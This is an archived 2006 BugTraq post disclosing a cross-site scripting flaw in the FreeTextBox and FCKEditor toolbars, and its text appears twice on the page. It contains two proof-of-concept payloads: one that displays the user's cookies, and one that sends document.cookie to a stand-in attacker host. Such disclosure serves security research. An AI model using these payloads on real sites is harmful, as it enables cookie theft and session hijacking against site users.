BugTraq
Back to list
|
Post reply
XSS in FreeTextBox and FCKEditor Basic Toolbar Selection
May 14 2006 05:56PM
bonsite hotmail com
More information about it on :
http://www.newffr.com/viewtopic.php?forum=26&topic=11683
(in french)
If you don't speak french :
create a web page and write into :
------------------
<html><body><a href="javascript: alert('Cookie:\n'+document.cookie+'\nHave Fun !')">Click here</a></body></html>
------------------
Or :
------------------
<a href="#" onmouseout="javascript: document.location='http://www.hacker.com/get_cookie.php?'+document.cooki
e">Link</a>
------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
http://www.newffr.com/viewtopic.php?forum=26&topic=11683
(in french)
If you don't speak french :
create a web page and write into :
------------------
<html><body><a href="javascript: alert('Cookie:\n'+document.cookie+'\nHave Fun !')">Click here</a></body></html>
------------------
Or :
------------------
<a href="#" onmouseout="javascript: document.location='http://www.hacker.com/get_cookie.php?'+document.cooki
e">Link</a>
------------------
[ reply ]